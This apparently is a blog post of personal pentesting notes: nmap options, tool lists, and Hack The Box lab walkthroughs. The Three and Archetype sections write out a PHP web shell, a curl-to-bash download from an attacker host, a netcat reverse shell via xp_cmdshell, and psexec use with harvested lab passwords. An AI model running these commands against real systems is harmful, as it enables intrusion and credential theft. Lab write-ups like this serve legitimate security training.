Pentest- HACK THE BOX

Pentesting Notes - HACK THE BOX

Disclaimer:

  • This document contains unedited notes and has not been formally proofread.
  • The information provided in this document is intended to provide a basic understanding of certain technologies.
  • Please exercise caution when visiting or downloading from websites mentioned in this document and verify the safety of the website and software.
  • Some websites and software may be flagged as malware by antivirus programs.
  • The document is not intended to be a comprehensive guide and should not be relied upon as the sole source of information.
  • The document is not a substitute for professional advice or expert analysis and should not be used as such.
  • The document does not constitute an endorsement or recommendation of any particular technology, product, or service.
  • The reader assumes all responsibility for their use of the information contained in this document and any consequences that may arise.
  • The author disclaim any liability for any damages or losses that may result from the use of this document or the information contained therein.
  • The author reserve the right to update or change the information contained in this document at any time without prior notice.

  • Any attempts to perform penetration testing or ethical hacking on systems or networks should be done with the explicit permission of the system/network owner. Unauthorized access is illegal and can result in serious legal consequences.
  • It is important to fully understand the scope of the testing and to only test within that scope. Testing outside the agreed upon scope is considered unauthorized and may result in legal action.
  • Any findings or vulnerabilities discovered during testing should be reported to the system/network owner immediately and kept confidential until a fix can be implemented.
  • It is recommended to use a separate, dedicated testing environment rather than testing on a live production system to minimize the risk of accidentally causing damage or downtime.
  • It is important to take steps to protect your own identity and prevent accidental data leaks or exposure of sensitive information during testing.
  • It is also recommended to follow a standard code of ethics for ethical hacking and penetration testing.

References

  • https://www.linkedin.com/learning/
  • HACKTHEBOX 

 **********************************************************************************

Nmap Commands 

Nmap Tutorial to find Network Vulnerabilities

  • nmap -sS -D 10.1.0.1
-D = decoy  and specifying a dummy ip-address 

Nmap Scripting Engine (NSE)

to check vulnerabilities 
  • sudo nmap --script vuln 

Security Testing: Nmap Security Scanning :- 

  • dig www.google.com  = gives the IP address 
-Pn  No Host discovery  = Nmap skips the host searching process & performs full target scan 
-PS means TCP SYN request
-PA means TCP ACK request
-PU means UDP request 
-PE means ICMP echo request 
-PR means ARP request

  • TCP Scan Types 
-sS    TCP SYN scan ( half open scan / stealthy  scan)
-sT = TCP  connect scan (full open scan)
-sN = TCP  NULL scan
-sF = TCP  FIN scan
-sX = TCP  Xmas scan
-sA = TCP  ACK scan
-sW = TCP window scan
-sM  = TCP maimon scan

-F  flag  does a fast scan 
e.g. nmap  -F 192.168.1.1

Timing template 

-T5  insane 
-T4  aggressive
-T3  Normal
-T2  polite
-T1 sneaky
-T0 paranoid 

-sV  = Service version detection
  • sudo nmap -sV -O -F 10.0.2.4 
E.g. = nmap -T4 -F 192.168.1.*

-A option provide details and inbuilt script of nmap scan
sudo nmap -A -T4 192.168.1.*
  • nmap saving output files
-oN = Human readable text file
-oX = Machine readable file
-oG = Grepable text file
  • -v  = allows to see progress by nmap 
DNS spoofing: 
windows powershell : ipconfig /displaydns

***********************************************************************

How to check a website:

First step to check a website with robots.txt
https://www.google.com/robots.txt

HackThisSite
hackthissite.org
HackThisSite.org, commonly referred to as HT

Page source or inspect element or Ctrl+U

Check for 
- Passwords in comments
Comments
Hidden forms

Developer tools - ctrl+Shift+I

How to scrape sitemap:

  • https://www.seowl.co/sitemap-extractor/
  • https://robhammond.uk/tools/xml-extract
  • https://www.xml-sitemaps.com/
  • https://www.mariolambertucci.com/how-to-extract-urls-from-sitemaps/

Linux commands

  • Ls
  • Cd
  • Grep
  • Su
  • Pwd
  • Whoami
  • Mv
  • Cp
  • Mkdir
  • Cat

Tools:

Kali Linux
Scanning
  • Nmap
  • Nikto
  • Zenmap
  • Threader3000
  • angry IP 
  • NetCat
  • Hydra
  • Wireshark
  • Dirbuster
  • Burp suite
Exploit
  • metasploit
***********************************************************************

HACKTHEBOX [HTB]

HTB - Responder

Microsoft employs NTLM

By taking advantage of a File Inclusion vulnerability present on a webpage hosted on a Windows machine, an attacker can collect the NetNTLMv2 hash used for authentication services implemented through technologies such as (New Technology LAN Manager) and Kerberos. The attacker can then utilize a tool called "Responder" to capture the NetNTLMv2 hash, which can subsequently be subjected to brute-force attacks using "John the Ripper" in an attempt to match the original password used to create the hash.

  • -p- : This flag scans for all TCP ports ranging from 0-65535
  • -sV : Attempts to determine the version of the service running on a port
  • --min-rate : This is used to specify the minimum number of packets Nmap should send per second; it speeds up the scan as the number goes higher
  1. nmap -p- --min-rate 5000 -sV 10.129.37.49
Apache web server running on port 80 along with WinRM on port 5985, Windows Remote Management, or WinRM,

echo "10.129.37.49 unika.htb" | sudo tee -a /etc/hosts

the /etc/hosts file is used to resolve a hostname into an IP address & thus we will need to add an entry in
the /etc/hosts file for this domain to enable the browser to resolve the address for unika.htb

File Inclusion Vulnerability

FI or Local File Inclusion occurs when an attacker is able to get a website to include a file that was not intended to be an option for this application
RFI or Remote File Inclusion is similar to LFI but in this case it is possible for an attacker to load a remote file on the host using protocols like HTTP, FTP etc.

Responder 

Microsoft developed NTLM as a set of authentication protocols, which primarily employ a challenge-response mechanism. Its purpose is to validate a client's credentials for accessing a resource within an Active Directory domain.
NTLM vs NTHash vs NetNTMLv2
*******************

HTB - Three

  • Enumeration
    • nmap -sV  10.129.77.99  

  • To access the domain thetoppers.htb in our browser, we need to add an entry for it in the /etc/hosts file with its corresponding IP address. The /etc/hosts file is responsible for resolving hostnames to IP addresses, and it is queried before the DNS server by default. Therefore, we must add an entry in the /etc/hosts file for this domain to enable the browser to resolve its address.

  • echo "10.129.77.99 thetoppers.htb" | sudo tee -a /etc/hosts 

  • Sub-domain enumeration
    • Let's also add an
    • entry for this sub-domain in the /etc/hosts file echo "10.129.77.99 s3.thetoppers.htb" | sudo tee -a /etc/hosts

  • gobuster vhost -w  /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://thetoppers.htb

  • echo "10.129.11.227 thetoppers.htb" | sudo tee -a /etc/hosts
    • 10.129.11.227 thetoppers.htb

  • apt install awscli 
    • aws configure
    • aws --endpoint=http://s3.thetoppers.htb s3 ls

  • gedit shell.php
    • <?php system($_GET["cmd"]); ?>

  • aws --endpoint=http://s3.thetoppers.htb s3 cp shell.php s3://thetoppers.htb

    • upload: ./shell.php to s3://thetoppers.htb/shell.php


  • We can confirm that our shell is uploaded by navigating to http://thetoppers.htb/shell.php. Let us try

    • executing the OS command id using the URL parameter cmd

    • http://thetoppers.htb/shell.php?cmd=id

      • uid=33(www-data) gid=33(www-data) groups=33(www-data)


  • We can confirm that our shell is uploaded by navigating to http://thetoppers.htb/shell.php. Let us try

    • executing the OS command id using the URL parameter cmd .


  • Let's get a reverse shell by creating a new file shell.sh containing the following bash reverse shell payload

    • which will connect back to our local machine on port 1337 .

    • We will start a ncat listener on our local port 1337 using the following command.

    • nc -nvlp 1337


  • let's start a web server on our local machine on port 8000 

    • python3 -m http.server 8000

  • We can use the curl utility to fetch the bash reverse shell file from our local host and then pipe it to bash

  • in order to execute it. Thus, let us visit the following URL containing the payload in the browser.


  • http://thetoppers.htb/shell.php?cmd=curl%2010.10.15.203:8000/shell.sh|bash

  • The flag can be found at /var/www/flag.txt .

  • cat /var/www/flag.txt


Other way to get flag: 


  • http://thetoppers.htb/shell.php?cmd=id

    • uid=33(www-data) gid=33(www-data) groups=33(www-data)


  • http://thetoppers.htb/shell.php?cmd=ls


  • http://thetoppers.htb/shell.php?cmd=ls+

    • images index.php shell.php

  • http://thetoppers.htb/shell.php?cmd=ls+..

    • flag.txt html 

  • http://thetoppers.htb/shell.php?cmd=cat+../flag.txt

*******************

Archetype


Archetype which is a Windows machine, you can have a chance to exploit a misconfiguration in Microsoft SQL Server, try getting a reverse shell and get familiarized with the use of IMPACKET tool in order to further attack some services.

nmap -sC -sV 10.129.211.114

SMB ports are open and also that a Microsoft SQL Server 2017 is running on port 1433.

root㉿kali ~ smbclient -N -L  \\\\10.129.211.114\\ 
-N : No password
-L : This option allows you to look at what services are available on a server

we can try to access and enumerate the backups 
(root㉿kali)-[~] smbclient -N   \\\\10.129.211.114\\backups
smb: \> dir
smb: \> get prod.dtsConfig 

here is a file named prod.dtsConfig which seems like a configuration file

By reviewing the content of this configuration file, we spot in cleartext the password of the user sql_svc ,
which is M3g4c0rp123 , for the host ARCHETYPE .

By reviewing the content of this configuration file, we spot in cleartext the password of the user sql_svc ,
which is M3g4c0rp123 , for the host ARCHETYPE .

Impacket is a collection of Python classes for working with network protocols.

(root㉿kali)-[~] locate mssqlclient.py
/usr/share/doc/python3-impacket/examples/mssqlclient.py

We can try to connect to the MSSQL server by using impacket's mssqlclient.py script 
root㉿kali)-[~]
└─# python3 /usr/share/doc/python3-impacket/examples/mssqlclient.py ARCHETYPE/sql_svc:M3g4c0rp123@10.129.211.114 -windows-auth 
SQL> help
SQL> SELECT is_srvrolemember('sysadmin');
SQL> enable_xp_cmdshell
SQL> xp_cmdshell “whoami”
SQL> xp_cmdshell "powershell -c pwd"
output 
C:\Windows\system32  


Run new window 2:
python3 -m http.server


Then 
SQL> xp_cmdshell "powershell.exe wget http://10.10.14.140:8000/nc.exe -OutFile c:\\Users\Public\\nc.exe"

Window 2: output
(root㉿kali)-[/home/kali/Downloads]
└─# python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.129.211.114 - - [01/Mar/2023 22:57:50] "GET /nc.exe HTTP/1.1" 200 -


Window 3:
(root㉿kali)-[~]
└─# nc -nvlp 4444 


Then SQL 
xp_cmdshell "c:\\Users\Public\\nc.exe -e cmd.exe 10.10.14.140 4444"

Window 3 output:
(root㉿kali)-[~]
└─# nc -nvlp 4444           
listening on [any] 4444 ...
connect to [10.10.14.140] from (UNKNOWN) [10.129.211.114] 49684
Microsoft Windows [Version 10.0.17763.2061]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>
C:\Windows\system32>cd \
C:\Users\sql_svc\Desktop>
C:\Users\sql_svc\Desktop>type user.txt 
C:\Users\sql_svc\Desktop>powershell
PS C:\Users\sql_svc\Desktop> wget http://10.10.14.140:8000/winPEASx64.exe -outfile winPEASx64.exe
wget http://10.10.14.140:8000/winPEASx64.exe -outfile winPEASx64.exe
PS C:\Users\sql_svc\Desktop> ./winPEASx64.exe
PS C:\Users\sql_svc\Desktop> cd \
PS C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine> type ConsoleHost_history.txt
Output- 
type ConsoleHost_history.txt
net.exe use T: \\Archetype\backups /user:administrator MEGACORP_4dm1n!!
exit

Kill window 3 & Kill SQL window

New window 4:
──(root㉿kali)-[~]
└─# python3 /usr/share/doc/python3-impacket/examples/psexec.py administrator@10.129.211.114
C:\Windows\system32> 
C:\Windows\system32> cd \
C:\> cd users
C:\Users> cd Administrator
C:\Users\Administrator\Desktop> type root.txt

***********************************************************************************************************


Comments

Post a Comment

Popular Posts

Chennai :MTC complaint cell Customer Care No.:+91-9445030516 /Toll Free : 18005991500

MTC  website :  https://mtcbus.tn.gov.in/ Phone : +91 9445030516 / 044 23455888 Customer Care No.:+91-9445030516 /Toll Free : 18005991500 phone 044 - 23455888 customercare.mtc@tn.gov.in <customercare.mtc@tn.gov.in>; Route Information : https://mtcbus.tn.gov.in//Home/routewiseinfo Bus timing search : https://mtcbus.tn.gov.in/Home/bustimingsearch Route wise info :https://mtcbus.tn.gov.in/Home/routewiseinfo The Metropolitan Transport Corporation’s (MTC) complaint cell has received over 100 complaints ever since it was upgraded from a 12-hour facility to a 24-hour service.   The numbers — 044-23455858, 9445030516 and 9383337639 — have been functioning as MTC’s helpline for the past couple of years.
Read more

HOME LAB : HANDS-ON

Image
HOME LAB : HANDS-ON Disclaimer Home LAB Security Audit : GRC (Governance Risk Compliance) Overview Security Assessment reviews Identifying and analyzing Targets  Planning Technical Security Assessments  Executing the Technical security  Post testing activities  ISO 27001 AND 27002 What key insights can be gained from learning about ISO 27001: How to create and implement the Information System Management within the organization. Discuss on the Framework based on the ISO 27001 Three pillars: Confidentiality, Integrity and Availability I SO 9001 & AS9100 Comparison between ISO 9001 and AS9100 Additional requirements for As9100 Risk Management Demystifying risk management: My insights on what it is, how to recognize it, and strategies for mitigation.  Dashboard Transform data into insights with Excel dashboards. My latest blog post guides you through building a sample dashboard using pivot tables & graphs, explaining each parameter choice. Plus, explore alternative tools like Power
Read more

Marriage Registration Online steps [Tamil Nadu]

Marriage Registration Online 1. Hindu Marriage Act 2. TamilNadu Marriage Act Steps To follow 1. Log into :-> https://tnreginet.gov.in/portal/  2. Click on "User Registration"   under " LOGIN " section 3. Now Login with UserID & Password  Hindu Marriage Registration 4. After Log in then select  Home > Marriage Registration > Hindu Marriage Registration 5. Fill in the details     1. Husband details           A.  Details Must be know - District, Taluk, Village and then f rom Drop down select the " street name "         B . if any of the parent is not alive mark the same and produce the death certificate while submitting the application in-person.      2. Wife Details          A. same as above, have all the information to fill in details 3. Witness Options 4. Other Details 5. Proof Details: for Husband & Wife  Home > Draft Listing TamilNadu Marriage Act     A. 3 Witness are required as mandate.     B. Select from the Drop down Witness Opt
Read more